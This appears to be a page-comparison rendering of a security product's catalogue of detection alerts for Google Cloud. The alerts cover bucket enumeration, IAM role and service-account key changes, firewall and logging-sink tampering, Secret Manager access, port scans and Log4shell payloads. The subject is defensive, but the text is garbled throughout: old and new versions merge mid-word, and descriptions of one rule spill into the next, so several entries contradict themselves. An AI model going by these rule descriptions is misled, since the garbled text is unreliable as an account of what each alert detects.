Page Comparison

An attacker could intend to modify, or gain, privileges on a Cloud SQL Database.

Source table → cloud.gcp

An attacker could be performing reconnaissance on a GCP project trying to enumerate permissions.

Source table → cloud.gcp

An attacker may have created a new Route to bypass restrictions on traffic routing segregating trusted and untrusted networks.

Source table → cloud.gcp

An attacker could be enumerating GCS buckets to gain more information regarding the Google Cloud project.This alert filters Google Cloud Audit Logs in order to find those which have storage.buckets.list as methodName. It also filters the main account so as to only get the actions performed by service accountsadversary could create a Google Cloud Pub/Sub topic to collect data.

Source table → cloud.gcp

An attacker could be modifying permissions, or accessibility, over a bucket.This alert filters Google Cloud Audit Logs in order to find those which have storage.buckets.update as methodName. It also extracts the name of the bucket being updated to include this value in the alert templateadversary could delete a Google Cloud Pub/Sub topic to impair event aggregation and analysis mechanisms.

Source table → cloud.gcp

An attacker could be modifying permissions, or accessibility, over a bucket to make it public, or creating a public one.This alert filters Google Cloud Audit Logs in order to find those which have storage.buckets.create or storage.setIamPermissions as methodName. It also extracts the name of the bucket being updated to include this value in the alert template. It then retrieves the first five pairs of member and action fields within the bindingDeltas array, and checks in each pair if member is equal to allUsers and action is equal to ADDmay have deleted a VPC Route to interrupt the availability of systems and network resources.

Source table → cloud.gcp

Alert that checks attempts to exploit CVE-2021-44228 known as Log4shell. The query looks for payload patterns associated with this vulnerability in the log raw message. This would include payloads included in the URL, user-agent header, referrer header, or POST and PUT HTTP bodies. [WARNING] This alert detects attack patterns and can generate a high volume of events due to the number of scanners currently testing systems on the Internet. It is therefore likely to need some kind of tunning.

Source table → cloud.gcp

An attacker could be performing reconnaissance against a network.This alert filters events from cloud.gcp.compute.firewall, checking if the source IP is public and the destination IP is private. It then groups by projects, locations, source IPs and destination IPs, and counts the different number or destination ports. The alert is triggered when this number is greater than five.

Source table → cloud.gcp

An attacker could be performing reconnaissance against a network.This alert filters events from cloud.gcp.compute.firewall, checking if the source IP is public and if the destination IP is private. It then groups by projects, locations, source IPs and ports, and counts the different numbers or destination IPs. The alert is triggered when this number is greater than five.modifying permissions, or accessibility, over a bucket.

Source table → cloud.gcp

An attacker could be attempting to access, or modify, the Secret Manager service.This alert filters Google Cloud Audit to find those that contain the string SecretManagerService in parameter protoPayload_methodName. This way we filter events coming from the Secret Manager service. It then counts the number of events and filters when it is greater than 10.creating a service account to gain persistence on the project.

Source table → cloud.gcp

An attacker could intend to enumerate the environment.This alert identifies GCP API requests using GET and LIST methods, that when observed in combination, could indicate that an actor is trying to enumerate the environment. These events are usually generated during normal operations so it is necessary to use this alert as context around other security incidentsgain access to a Secret or ConfigMap.

Source table → cloud.gcp

An attacker could be performing reconnaissance on a GCP project trying to enumerate permissions.This alert filters events from the cloud.gcp table, checking if protoPayload_status_code is equal to seven. This code corresponds to unauthorized requests to the API.  It then puts principal email into lower case and groups by resource_labels_project_id and lowerPrincipalEmail. The alert is triggered when the total of these events after grouping is greater than 10may have created a new Role to gain persistence.

Source table → cloud.gcp

An attacker could intend to collect data, making public the data from a GCP Storage Bucket.

This alert detects when a user makes public the entire content of a storage bucket.

be performing reconnaissance against a network.

Source table → cloud.gcp

An adversary may attempt to enumerate the cloud services running on GCP Kubernetes cluster’s pods.

This alert is triggered when more than 10 unauthorized requests are detected in less than five minutes, against GCP Kubernetes cluster’s pods, from the same IP address.

could delete an IAM Custom Role to disrupt the availability of system and network resources by inhibiting access to accounts used by legitimate users.

Source table → cloud.gcp

An attacker may have tried to bypass perimeter security by creating modifying a firewall rule.

This alert detects any attempt to create a firewall rule in Google Cloud Compute Engine.

Source table → cloud.gcp

An adversary could delete a Google Cloud Pub/Sub subscription to impair event aggregation and analysis mechanisms.

Source table → cloud.gcp

An attacker may have tried to bypass perimeter security by modifying a firewall rule.This alert detects any attempt to modify a firewall rule in Google Cloud Compute Enginecould be modifying a logging sink to avoid detection, or redirect logs to a different destination.

Source table → cloud.gcp

An attacker may have created a new role to gain persistence.This alert is triggered when a new Google Cloud IAM custom role is createdadversary could delete a IAM Service Account Key to manipulate the service account and maintain access to the systems.

Source table → cloud.gcp

An adversary could delete an IAM custom role to disrupt the availability of system and network resources by inhibiting access to accounts used by legitimate users.

This alert is triggered when a Google Cloud IAM custom role is deleted.

attacker could be deleting a logging sink to avoid detection.

Source table → cloud.gcp

An adversary could delete create a IAM Service account key Account Key to manipulate the a service account and maintain access to the systems.

Source table → cloud.This alert is triggered when a Google Cloud IAM Service Account Key is deletedgcp

An adversary could remove a Google Cloud Logging Bucket to impair event aggregation and analysis mechanisms.This alert is triggered when a Google Cloud Logging Bucket is deleted

Source table → cloud.gcp

An adversary could create a Google Cloud Pub/Sub Subscription to collect data.This alert is triggered when a Google Cloud Pub/Sub Subscription is createdattacker could be enumerating GCS buckets to gain more information regarding the Google Cloud project.

Source table → cloud.gcp

An adversary could delete a Google Cloud Pub/Sub subscription to impair event aggregation and analysis mechanisms.This alert is triggered when a Google Cloud Pub/Sub subscription is deletedmay modify Storage Bucket Permissions to evade access control lists (ACLs) and access protected files.

Source table → cloud.gcp

An adversary attacker could create delete a Google Cloud Pub/Sub topic to collect data.This alert is triggered when a Google Cloud Pub/Sub topic is createdVirtual Private Cloud Network (VPC) to interrupt availability of systems and network resources.

Source table → cloud.gcp

An adversary could delete a Google Cloud Pub/Sub topic to impair event aggregation and analysis mechanisms.This alert is triggered when a Google Cloud Pub/Sub topic is deletedStorage Bucket to destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources.

Source table → cloud.gcp

An attacker could delete a Service Account to interrupt the availability of systems and network resources by inhibiting access to accounts utilized by legitimate users.This alert is triggered when a Google Cloud IAM service account is deletedintend to collect data, making public the data from a GCP Storage Bucket.

Source table → cloud.gcp

An adversary could disable a IAM Service Account to manipulate the service account and maintain access to the systems.

This alert is triggered when a Google Cloud IAM service account is disabled.

attacker could intend to enumerate the environment.

Source table → cloud.gcp

An adversary could create disable a IAM Service Account Key to manipulate a the service account and maintain access to the systems.

This alert is triggered when a Google Cloud IAM Service Account Key is created.

Source table → cloud.gcp

An adversary could delete a Google Cloud Storage Bucket to destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources.This alert is triggered when a Google Cloud Storage Bucket is deletedattacker could be modifying permissions, or accessibility, over a bucket to make it public, or creating a public one.

Source table → cloud.gcp

An attacker could be attempting to access, or modify, the Secret Manager service

Source table → cloud.gcp

A high - risk role has have been assigned to a user, this could indicate that a malicious actor could be trying to escalate privileges within a project.

This alert filters Google Cloud Audit Logs to find those which have the method name equal to SetIamPolicy. The alert then parses the different roles and actions from the binding deltas in the protopayload. This alert will only consider the first five actions and roles: any following actions, or roles, will be disregarded. This alert triggers when one of the pairs action-role meets the following criteria: the action is equal to ADD and the roles are one of the following: roles/owner, roles/editor, roles/iam.serviceAccountUser, roles/iam.serviceAccountAdmin, roles/iam.serviceAccountTokenCreator, roles/dataflow.developer, roles/dataflow.admin, roles/composer.admin, roles/dataproc.admin or roles/dataproc.editor.

Source table → cloud.gcp

An attacker could delete a Virtual Private Cloud Network (VPC) Service Account to interrupt availability of systems and network resources .This alert filters Google Cloud Audit Logs with a method name equal to "v*.compute.networks.delete" to detect when a Google cloud VPC is deleted.by inhibiting access to accounts utilized by legitimate users.

Source table → cloud.gcp

An adversary may attempt to enumerate the cloud services running on GCP Kubernetes cluster’s pods

Source table → cloud.gcp

An attacker could be deleting a logging sink to avoid detection.

This alert filters Google Cloud Audit Logs to find the log entries that have the method name equal to google.logging.v2.ConfigServiceV2.DeleteSink.

may have tried to bypass perimeter security by deleting a firewall rule.

Source table → cloud.gcp

Updating the state of a crypto key is an unusual event that should be checked and considered in context with other suspicious events occurring in the same GCP project.

Source table → cloud.gcp